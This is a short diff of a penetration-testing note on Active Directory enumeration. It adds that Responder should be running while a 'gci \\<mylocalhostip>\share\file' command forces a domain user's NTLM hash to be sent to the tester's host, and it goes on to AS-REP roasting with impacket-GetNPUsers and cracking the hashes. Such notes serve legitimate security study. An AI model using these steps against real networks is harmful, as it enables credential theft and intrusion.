AndreMIsidoro/escalations/ldap_enumeration.md

 ## When we have a domain username, but no password

-Do a gci request to get the user hash (and use it in other protocols, and try to crack it)
+Do a gci request to get the user hash (and use it in other protocols, and try to crack it), with responder running

    gci \\<mylocalhostip>\share\file #share and file dont have to exist

 Run impacket-GetNPUsers